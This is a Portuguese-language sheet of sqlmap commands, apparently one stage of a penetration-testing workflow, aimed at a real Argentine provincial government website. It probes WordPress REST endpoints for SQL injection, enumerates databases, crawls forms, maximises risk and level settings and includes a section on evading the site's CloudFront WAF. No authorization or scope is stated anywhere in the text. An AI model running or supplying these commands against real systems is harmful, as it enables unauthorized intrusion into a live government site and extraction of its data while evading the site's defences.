# ============================================
# ETAPA 17: SQL INJECTION TESTING
# Comandos sqlmap para executar manualmente
# Outputs serão salvos em arquivos .txt
# ============================================
# Ferramenta: sqlmap (localizado em /c/Sec/Tools/sqlmap/)
# Python: python (Python 3.11.7)
# Alvo: https://desarrolloyempleo.cba.gov.ar

# ============================================
# COMANDOS BÁSICOS (RECOMENDADOS)
# ============================================

# Comando 1: Testar endpoint específico com parâmetro id (RECOMENDADO PARA INICIAR)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs > etapa17_sqlmap_id.txt 2>&1

# Comando 2: Testar endpoint com parâmetro page_id
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?page_id=1" --batch --dbs > etapa17_sqlmap_page_id.txt 2>&1

# Comando 3: Testar endpoint base automaticamente (forms e crawl)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar" --forms --crawl=2 --batch > etapa17_sqlmap_forms_crawl.txt 2>&1

# Comando 4: Testar endpoint wp-json sem parâmetros (detectar parâmetros automaticamente)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992" --batch --dbs > etapa17_sqlmap_wpjson.txt 2>&1

# ============================================
# COMANDOS COM PARÂMETROS ESPECÍFICOS
# ============================================

# Comando 5: Testar com parâmetro password (já identificado como funcional na Etapa 14)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" --batch --dbs > etapa17_sqlmap_password.txt 2>&1

# Comando 6: Testar com parâmetro context
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?context=view" --batch --dbs > etapa17_sqlmap_context.txt 2>&1

# Comando 7: Testar múltiplos parâmetros simultaneamente
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1&page_id=1&context=view" --batch --dbs > etapa17_sqlmap_multiple_params.txt 2>&1

# ============================================
# COMANDOS AVANÇADOS (EVASÃO DE WAF)
# ============================================

# Comando 8: Testar com user-agent customizado (evasão de WAF CloudFront)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs --random-agent > etapa17_sqlmap_random_agent.txt 2>&1

# Comando 9: Testar com nível de risco e profundidade aumentados
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --risk=3 --level=5 --dbs > etapa17_sqlmap_risk3_level5.txt 2>&1

# Comando 10: Testar apenas detecção (sem exploração completa)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs --technique=BEUSTQ > etapa17_sqlmap_technique.txt 2>&1

# Comando 11: Testar com delay entre requisições (evitar bloqueio)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs --delay=2 > etapa17_sqlmap_delay.txt 2>&1

# Comando 12: Testar com timeout aumentado
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs --timeout=30 > etapa17_sqlmap_timeout.txt 2>&1

# ============================================
# COMANDOS PARA TESTES ESPECÍFICOS
# ============================================

# Comando 13: Testar apenas se é vulnerável (sem listar databases)
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch > etapa17_sqlmap_basic.txt 2>&1

# Comando 14: Testar com cookie (se necessário para autenticação)
# python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs --cookie="COOKIE_VALUE" > etapa17_sqlmap_cookie.txt 2>&1

# Comando 15: Testar POST request (se necessário)
# python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992" --data="id=1" --batch --dbs > etapa17_sqlmap_post.txt 2>&1

# ============================================
# COMANDO RECOMENDADO PARA INICIAR:
# ============================================
python /c/Sec/Tools/sqlmap/sqlmap.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?id=1" --batch --dbs > etapa17_sqlmap_id.txt 2>&1

# ============================================
# NOTAS IMPORTANTES:
# ============================================
# - O parâmetro --batch executa sem interação do usuário
# - O parâmetro --dbs lista os bancos de dados se vulnerável
# - WordPress geralmente usa MySQL/MariaDB
# - WAF CloudFront pode bloquear requisições suspeitas
# - Use --random-agent ou --delay para evasão de WAF
# - Todos os outputs são salvos em arquivos .txt no diretório reports/
# - O redirecionamento 2>&1 captura tanto stdout quanto stderr
# ============================================

